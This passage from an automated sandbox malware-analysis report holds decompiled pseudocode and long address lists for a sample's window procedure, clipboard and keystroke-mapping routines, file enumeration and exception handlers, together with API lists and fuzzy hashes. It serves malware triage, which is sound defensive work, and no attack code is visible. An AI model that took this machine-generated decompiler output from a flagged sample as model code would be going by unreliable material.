																										TrackPopupMenu(??, ??, ??, ??, ??, ??, ??);
																									}
																								}
																								goto L193;
																							} else {
																								if(_v160 == 0x205) {
																									L113:
																									_v188 = _a12;
																									_v292 = _v24;
																									_v288 = _a16;
																									_v128 = E001AA070();
																									 *(_t1196 - 8) = _v24;
																									_v296 = _v128;
																									_v292 = _v188;
																									_v288 = 0;
																									E001AA0F0(_t1169);
																									goto L193;
																								} else {
																									if(_v160 == 0x206) {
																										goto L114;
																									} else {
																										if(_v160 + 0xfffffdf9 - 2 < 0) {
																											goto L113;
																										} else {
																											if(_v160 == 0x209) {
																												goto L114;
																											} else {
																												if(_v160 == 0x20a) {
																													_t1000 =  *((intOrPtr*)(_v24 + 8));
																													_t1124 =  *((intOrPtr*)(_v24 + 8));
																													_t1166 =  *((intOrPtr*)(_v24 + 8));
																													__eflags =  *((intOrPtr*)(_t1000 + 0x10)) -  *((intOrPtr*)(_t1124 + 0x7c)) -  *((intOrPtr*)(_t1166 + 0x74)) + 1;
																													if( *((intOrPtr*)(_t1000 + 0x10)) >  *((intOrPtr*)(_t1124 + 0x7c)) -  *((intOrPtr*)(_t1166 + 0x74)) + 1) {
																														goto L153;
																													} else {
																														_v224 = _a12;
																														_v292 = _v24;
																														_v288 = _a16;
																														_v144 = E001AA070();
																														 *(_t1196 - 8) = _v24;
																														_v296 = _v144;
																														_v292 = _v224;
																														_v288 = 4;
																														E001AA0F0(_t1169);
																													}
																													L193:
																													_v20 = 0;
																												} else {
																													if(_v160 == 0x401) {
																														goto L54;
																													} else {
																														_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _v20;
			}

0x001a34fb
0x001a34fd
0x001a34ff
0x001a350b
0x001a350d
0x001a3510
0x001a3513
0x001a3516
0x001a351f
0x001a3762
0x001a3525
0x001a3533
0x001a376d
0x001a3780
0x00000000
0x001a3539
0x001a3547
0x001a4020
0x001a4023
0x001a402a
0x001a4033
0x001a4039
0x001a403d
0x001a404e
0x001a4057
0x001a405e
0x001a4061
0x001a4064
0x001a4098
0x001a406a
0x001a4085
0x001a4088
0x001a4088
0x001a40a9
0x001a40c7
0x001a40ca
0x001a40cd
0x001a40fe
0x001a40d3
0x001a40eb
0x001a40ee
0x001a40ee
0x001a4118
0x001a411b
0x001a411f
0x001a4123
0x001a4128
0x001a403d
0x00000000
0x001a354d
0x001a355b
0x001a3f7b
0x001a3f7e
0x001a3f85
0x001a3f8e
0x001a3f91
0x001a3f95
0x001a3fd9
0x001a3fe5
0x001a3fe8
0x001a3fed
0x001a3f95
0x00000000
0x001a3561
0x001a356f
0x001a3ff5
0x001a3ff8
0x001a3fff
0x001a4008
0x001a400b
0x001a400f
0x001a4015
0x001a4015
0x001a400f
0x00000000
0x001a3575
0x001a3583
0x001a37c4
0x001a37c7
0x001a37ce
0x001a37ec
0x001a380e
0x001a38bc
0x001a38c2
0x001a38ce
0x001a38d2
0x001a38de
0x001a38e1
0x001a38e5
0x001a38ea
0x001a38ea
0x001a38f9
0x001a38fc
0x001a3900
0x00000000
0x001a37d4
0x00000000
0x001a3589
0x001a3597
0x001a390e
0x001a3911
0x001a3918
0x001a3923
0x001a3927
0x001a3943
0x001a3949
0x001a394d
0x001a3962
0x001a3968
0x001a3974
0x001a392d
0x001a3930
0x001a3933
0x001a3938
0x00000000
0x001a391e
0x00000000
0x001a359d
0x001a35b0
0x001a3980
0x001a3983
0x001a398a
0x001a39d8
0x001a39de
0x001a39e8
0x001a39e8
0x001a39f1
0x001a39f4
0x001a39f8
0x001a39fc
0x001a3a00
0x001a3990
0x001a3993
0x001a3999
0x001a399d
0x00000000
0x001a39a3
0x001a39a9
0x001a39bc
0x001a39bf
0x001a39c3
0x001a39c7
0x001a39cb
0x001a39d0
0x001a399d
0x00000000
0x001a35b6
0x001a35c9
0x001a3a13
0x001a3a26
0x001a3a29
0x001a3a2d
0x001a3a31
0x001a3a35
0x00000000
0x001a35cf
0x001a35df
0x001a4671
0x001a4674
0x001a467b
0x001a4689
0x001a468e
0x001a4694
0x001a4697
0x001a46aa
0x001a46aa
0x001a485a
0x001a4681
0x00000000
0x001a4681
0x001a35e5
0x001a35f5
0x001a45c4
0x001a45c7
0x001a45ce
0x001a45d9
0x001a45dc
0x001a45e2
0x001a45e7
0x001a460d
0x001a4610
0x001a4618
0x00000000
0x001a45ed
0x001a45f8
0x001a45fd
0x001a4628
0x001a462b
0x001a4633
0x001a466c
0x00000000
0x001a4603
0x001a4664
0x001a4664
0x001a45fd
0x001a45d4
0x00000000
0x001a45d4
0x001a35fb
0x001a360b
0x001a378e
0x001a378e
0x001a3791
0x001a3798
0x001a37a1
0x001a37a7
0x001a37ab
0x001a37b4
0x001a37b7
0x001a37bc
0x001a37ab
0x00000000
0x001a3611
0x001a3621
0x001a4145
0x001a4154
0x001a415a
0x001a415d
0x001a4164
0x001a416f
0x001a4175
0x001a417b
0x001a417f
0x001a4192
0x001a4192
0x001a4202
0x001a4209
0x001a4222
0x001a420f
0x001a4215
0x001a4215
0x001a4236
0x001a4242
0x001a4244
0x001a428f
0x001a428f
0x001a4295
0x001a424a
0x001a424a
0x001a4251
0x001a426a
0x001a4257
0x001a425d
0x001a425d
0x001a427b
0x001a427b
0x001a42a1
0x001a42b0
0x001a42b3
0x001a42b6
0x001a42c8
0x001a42d7
0x001a42d7
0x001a42e0
0x001a42e6
0x001a42e9
0x001a42ee
0x00000000
0x001a416a
0x00000000
0x001a3627
0x001a3637
0x001a4378
0x001a438d
0x001a439c
0x001a43a2
0x001a43a5
0x001a43ac
0x001a43b7
0x001a43be
0x001a4438
0x001a443e
0x001a4444
0x001a4448
0x001a445b
0x001a445b
0x001a43c4
0x001a43c4
0x001a43f1
0x001a43f7
0x001a4411
0x001a441b
0x001a442d
0x001a442d
0x001a44d0
0x001a44d7
0x001a44f0
0x001a44dd
0x001a44e3
0x001a44e3
0x001a4504
0x001a4510
0x001a4512
0x001a455d
0x001a455d
0x001a4563
0x001a4518
0x001a4518
0x001a451f
0x001a4538
0x001a4525
0x001a452b
0x001a452b
0x001a4549
0x001a4549
0x001a456f
0x001a457e
0x001a4581
0x001a4584
0x001a4596
0x001a45a5
0x001a45a5
0x001a45ae
0x001a45b4
0x001a45b7
0x001a45bc
0x00000000
0x001a43b2
0x00000000
0x001a363d
0x001a364d
0x001a4867
0x001a486a
0x001a4871
0x001a488c
0x001a48b0
0x001a4877
0x001a4882
0x001a4886
0x001a48ce
0x001a48da
0x001a48dd
0x001a48e1
0x00000000
0x00000000
0x00000000
0x00000000
0x001a4886
0x001a3653
0x001a3663
0x001a3bc0
0x001a3bc3
0x001a3bca
0x001a3c73
0x001a3c76
0x001a3c82
0x001a3c85
0x001a3c99
0x001a3ca2
0x001a3ca7
0x001a3cab
0x001a3caf
0x001a3cb7
0x001a3bd0
0x001a3bd3
0x001a3bd9
0x001a3bdd
0x001a3bf6
0x001a3bf6
0x001a3bfc
0x001a3bff
0x001a3c05
0x001a3c0e
0x001a3c14
0x001a3c18
0x001a3c24
0x001a3c27
0x001a3c33
0x001a3c36
0x001a3c42
0x001a3c4e
0x001a3c4e
0x001a3c57
0x001a3c5c
0x001a3c62
0x001a3c66
0x001a3c6b
0x001a3c27
0x001a3c18
0x001a3be3
0x001a3be6
0x001a3bec
0x001a3bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3bf0
0x001a3bdd
0x00000000
0x001a3669
0x001a3679
0x001a3a42
0x001a3a45
0x001a3a4c
0x001a3b6d
0x001a3b70
0x001a3b7c
0x001a3b7f
0x001a3b93
0x001a3b9c
0x001a3b9e
0x001a3ba3
0x001a3ba7
0x001a3bab
0x001a3bb3
0x001a3a52
0x001a3a55
0x001a3a5b
0x001a3a5f
0x001a3a78
0x001a3a7b
0x001a3a81
0x001a3a85
0x001a3a8e
0x001a3a90
0x001a3a93
0x001a3a9b
0x001a3aa0
0x001a3aa0
0x001a3aa6
0x001a3aac
0x001a3ab0
0x001a3ade
0x001a3ae7
0x001a3af3
0x001a3af6
0x001a3afa
0x001a3aff
0x001a3b0a
0x001a3b10
0x001a3b28
0x001a3b34
0x001a3b37
0x001a3b43
0x001a3b45
0x001a3b48
0x001a3b50
0x001a3b61
0x001a3ab6
0x001a3ab9
0x001a3abf
0x001a3ac3
0x00000000
0x001a3ac9
0x001a3ad2
0x001a3ad2
0x001a3ac3
0x001a3a65
0x001a3a68
0x001a3a6e
0x001a3a72
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3a72
0x001a3a5f
0x00000000
0x001a367f
0x001a368f
0x001a3cc4
0x001a3cc7
0x001a3cce
0x001a3d6e
0x001a3d71
0x001a3d7d
0x001a3d80
0x001a3d94
0x001a3d9d
0x001a3d9f
0x001a3da4
0x001a3da8
0x001a3dac
0x001a3db4
0x001a3cd4
0x001a3cd7
0x001a3cdd
0x001a3ce1
0x001a3cfa
0x001a3cfa
0x001a3d00
0x001a3d03
0x001a3d09
0x001a3d12
0x001a3d18
0x001a3d1c
0x001a3d28
0x001a3d2b
0x001a3d37
0x001a3d43
0x001a3d43
0x001a3d4c
0x001a3d51
0x001a3d57
0x001a3d5b
0x001a3d63
0x001a3d63
0x001a3d1c
0x001a3ce7
0x001a3cea
0x001a3cf0
0x001a3cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x001a3cf4
0x001a3ce1
0x00000000
0x001a3695
0x001a36a5
0x001a3f2a
0x001a3f2d
0x001a3f39
0x001a3f3c
0x001a3f50
0x001a3f59
0x001a3f5e
0x001a3f62
0x001a3f66
0x001a3f6e
0x00000000
0x001a36ab
0x001a36bb
0x001a3dc1
0x001a3dc4
0x001a3dcb
0x001a3e84
0x001a3e87
0x001a3e93
0x001a3e96
0x001a3eaa
0x001a3eb3
0x001a3eb5
0x001a3eba
0x001a3ebe
0x001a3ec2
0x001a3eca
0x001a3dd1
0x001a3dda
0x001a3de0
0x001a3de3
0x00000000
0x001a3de9
0x001a3df2
0x001a3e01
0x001a3e11
0x001a3e29
0x001a3e2c
0x001a3e30
0x001a3e4f
0x001a3e52
0x001a3e5a
0x001a3e5e
0x001a3e62
0x001a3e6a
0x001a3e6e
0x001a3e76
0x001a3e7c
0x001a3de3
0x00000000
0x001a36c1
0x001a36d1
0x001a3ed7
0x001a3eda
0x001a3ee6
0x001a3ee9
0x001a3efd
0x001a3f08
0x001a3f0d
0x001a3f11
0x001a3f15
0x001a3f1d
0x00000000
0x001a36d7
0x001a36e7
0x00000000
0x001a36ed
0x001a3700
0x00000000
0x001a3706
0x001a3716
0x00000000
0x001a371c
0x001a372c
0x001a42f9
0x001a4302
0x001a430b
0x001a4314
0x001a4316
0x00000000
0x001a431c
0x001a431f
0x001a432b
0x001a432e
0x001a4342
0x001a4351
0x001a4356
0x001a435a
0x001a435e
0x001a4366
0x001a436b
0x001a491a
0x001a491a
0x001a3732
0x001a3742
0x00000000
0x001a3748
0x001a4912
0x001a4912
0x001a3742
0x001a372c
0x001a3716
0x001a3700
0x001a36e7
0x001a36d1
0x001a36bb
0x001a36a5
0x001a368f
0x001a3679
0x001a3663
0x001a364d
0x001a3637
0x001a3621
0x001a360b
0x001a35f5
0x001a35df
0x001a35c9
0x001a35b0
0x001a3597
0x001a3583
0x001a356f
0x001a355b
0x001a3547
0x001a3533
0x001a492e

APIs

PostQuitMessage.USER32 ref: 001A3780
BeginPaint.USER32 ref: 001A37EC
BitBlt.GDI32 ref: 001A38BC
EndPaint.USER32 ref: 001A3900
GetCapture.USER32 ref: 001A3BF6
GetCapture.USER32 ref: 001A3CFA
ReleaseCapture.USER32 ref: 001A3D63
ClientToScreen.USER32 ref: 001A3E11
TrackPopupMenu.USER32 ref: 001A3E76
CreateCaret.USER32 ref: 001A3FD9
DestroyCaret.USER32 ref: 001A4015
DefWindowProcW.USER32 ref: 001A48A7
DefWindowProcW.USER32 ref: 001A4909

Strings

, xrefs: 001A38B4

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Capture$CaretPaintProcWindow$BeginClientCreateDestroyMenuMessagePopupPostQuitReleaseScreenTrack
String ID:
API String ID: 3375179393-3916222277
Opcode ID: de41b19ba59b5f53168082908af9f4fb19e089043c9b63b3018ee71ee6039c23
Instruction ID: 5afa20859c6718332196d09b080423eea49ef5ea31548928db64d267087bdf25
Opcode Fuzzy Hash: de41b19ba59b5f53168082908af9f4fb19e089043c9b63b3018ee71ee6039c23
Instruction Fuzzy Hash: 06B2C7B8A04205CFDB14DF68C684BAEBBF1BF49304F1185A9E859A7351D7709E84CF62

Uniqueness

Uniqueness Score: -1.00%

Function 001AAA00 Relevance: 12.2, APIs: 8, Instructions: 181clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 001AAA6A
EmptyClipboard.USER32 ref: 001AAA81
GlobalAlloc.KERNEL32 ref: 001AAA9F
GlobalLock.KERNEL32 ref: 001AAABB

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ClipboardGlobal$AllocEmptyLockOpen
String ID:
API String ID: 3590494090-0
Opcode ID: 7ea8488cf8b326610b24b2a1f2ae528f894ba9123faa917ad4be0954af20c9ac
Instruction ID: f05416c245169e088ee523af27657900ec3d25a4a0990ddf7dc54e43551789e2
Opcode Fuzzy Hash: 7ea8488cf8b326610b24b2a1f2ae528f894ba9123faa917ad4be0954af20c9ac
Instruction Fuzzy Hash: 3D81E574A002199FCB08DFA8C588ABDBBF0FF09315F154469E845EB351E734E981CB55

Uniqueness

Uniqueness Score: -1.00%

Function 001AACA0 Relevance: 12.1, APIs: 8, Instructions: 98clipboardkeyboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 001AACB5
GetClipboardData.USER32 ref: 001AACD3
GlobalLock.KERNEL32 ref: 001AACEF
GlobalSize.KERNEL32 ref: 001AAD0A
VkKeyScanW.USER32 ref: 001AAD53
MapVirtualKeyW.USER32 ref: 001AAD89
GlobalUnlock.KERNEL32 ref: 001AAE10
CloseClipboard.USER32 ref: 001AAE19

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ClipboardGlobal$CloseDataLockOpenScanSizeUnlockVirtual
String ID:
API String ID: 1615112705-0
Opcode ID: f7ad40149b0515b5a0089de057277dd954aea54071a9d24c83f5c9447bb85fea
Instruction ID: 3f51e8f12c20af99c99a56c01d0a750b21e28a8f76967d30c0c7c26d21164bfb
Opcode Fuzzy Hash: f7ad40149b0515b5a0089de057277dd954aea54071a9d24c83f5c9447bb85fea
Instruction Fuzzy Hash: 3C41D7B5904208EFDB00EFA8D5896ADBBF0FF05304F00846DE886E7351E7759994CB56

Uniqueness

Uniqueness Score: -1.00%

Function 001B5347 Relevance: 6.1, APIs: 4, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001B5347(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0x1c4050; // 0x33da424a
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E001B54BD( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E001B54BD(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E001B5293(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E001B80B0(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E001B54E1);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E001B5293(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E001ADB25(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

0x001b5352
0x001b5359
0x001b535c
0x001b535f
0x001b5365
0x001b5368
0x001b5370
0x001b5372
0x001b5385
0x001b538a
0x00000000
0x00000000
0x00000000
0x001b538a
0x001b538c
0x001b538c
0x001b5392
0x001b5398
0x001b53b4
0x001b53b5
0x001b53bb
0x001b53c7
0x001b53ca
0x001b53cc
0x001b53d3
0x001b53e8
0x001b53ed
0x001b53f7
0x001b5407
0x001b540d
0x001b540e
0x001b5415
0x001b5434
0x001b5443
0x001b5448
0x001b544b
0x001b5453
0x001b54a2
0x001b54a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001b5455
0x001b545d
0x001b5467
0x001b5467
0x001b546d
0x001b5471
0x001b5477
0x001b547c
0x001b5497
0x001b549c
0x001b547f
0x001b5485
0x001b53ef
0x001b53ef
0x00000000
0x001b53ef
0x001b539a
0x001b539a
0x001b539f
0x00000000
0x001b53a1
0x001b53a1
0x001b53a2
0x001b53a4
0x001b53a7
0x001b53ac
0x001b539f
0x001b54ae
0x001b54bc

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001B53E2
FindNextFileW.KERNEL32(00000000,?), ref: 001B545D
FindClose.KERNEL32(00000000), ref: 001B547F
FindClose.KERNEL32(00000000), ref: 001B54A2

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: b4ff65856aa28103f5cbe20301d7c8ff10b111b88889c0b9f310da28e7705250
Instruction ID: f175a213b9580d056562c36d6bcec6bb4da78f75f8a9d9e3756052b094373f22
Opcode Fuzzy Hash: b4ff65856aa28103f5cbe20301d7c8ff10b111b88889c0b9f310da28e7705250
Instruction Fuzzy Hash: 4941A271901A29AEDB20EFA4DD88BFEB7BAEB85355F144195E405D7150FB309EC08B60

Uniqueness

Uniqueness Score: -1.00%

Function 001AD72C Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001AD72C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E001AD6A0(_t34);
				 *_t60 = 0x2cc;
				_v632 = E001AFC30(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E001AFC30(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E001AD6A0(_t49);
				}
				return _t49;
			}

0x001ad72c
0x001ad72c
0x001ad72c
0x001ad740
0x001ad742
0x001ad745
0x001ad745
0x001ad749
0x001ad74e
0x001ad766
0x001ad76c
0x001ad772
0x001ad778
0x001ad77e
0x001ad784
0x001ad78a
0x001ad791
0x001ad798
0x001ad79f
0x001ad7a6
0x001ad7ad
0x001ad7b4
0x001ad7b5
0x001ad7be
0x001ad7c4
0x001ad7c7
0x001ad7cd
0x001ad7dc
0x001ad7e8
0x001ad7f3
0x001ad7fa
0x001ad801
0x001ad80c
0x001ad814
0x001ad81d
0x001ad81f
0x001ad822
0x001ad824
0x001ad82e
0x001ad836
0x001ad83c
0x00000000
0x001ad843
0x001ad846

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001AD738
IsDebuggerPresent.KERNEL32 ref: 001AD804
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001AD824
UnhandledExceptionFilter.KERNEL32(?), ref: 001AD82E

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 81025e8ef2c9dd2e74b2b93580bd70156085b5eeb8f14b788f6f3a2ec18c33dd
Instruction ID: 13f4c8cb7e9f5e45dc510b7eff4c98363020e0c6ab4f71351a870f24a5969fe2
Opcode Fuzzy Hash: 81025e8ef2c9dd2e74b2b93580bd70156085b5eeb8f14b788f6f3a2ec18c33dd
Instruction Fuzzy Hash: 0F314B79D4121C9BDB10DFA5D949BCCBBB8AF09304F1041AAE40EA7251EB709B85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 001B37DA Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E001B37DA(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x1c4050; // 0x33da424a
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E001AD6A0(_t41);
					_pop(_t61);
				}
				E001AFC30(_t66,  &_v804, 0, 0x50);
				E001AFC30(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x4
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -808
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E001AD6A0(_t57);
				}
				return E001ADB25(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x001b37da
0x001b37da
0x001b37da
0x001b37e5
0x001b37ea
0x001b37ec
0x001b37f4
0x001b37f6
0x001b37f9
0x001b37fe
0x001b37fe
0x001b380a
0x001b381d
0x001b382b
0x001b3831
0x001b3837
0x001b383d
0x001b3843
0x001b3849
0x001b384f
0x001b3855
0x001b385b
0x001b3861
0x001b3868
0x001b386f
0x001b3876
0x001b387d
0x001b3884
0x001b388b
0x001b388c
0x001b3895
0x001b389b
0x001b389b
0x001b389e
0x001b38a4
0x001b38b1
0x001b38ba
0x001b38c3
0x001b38cc
0x001b38da
0x001b38dc
0x001b38e2
0x001b38f1
0x001b38fd
0x001b3900
0x001b3905
0x001b3912

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001B38D2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001B38DC
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 001B38E9

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

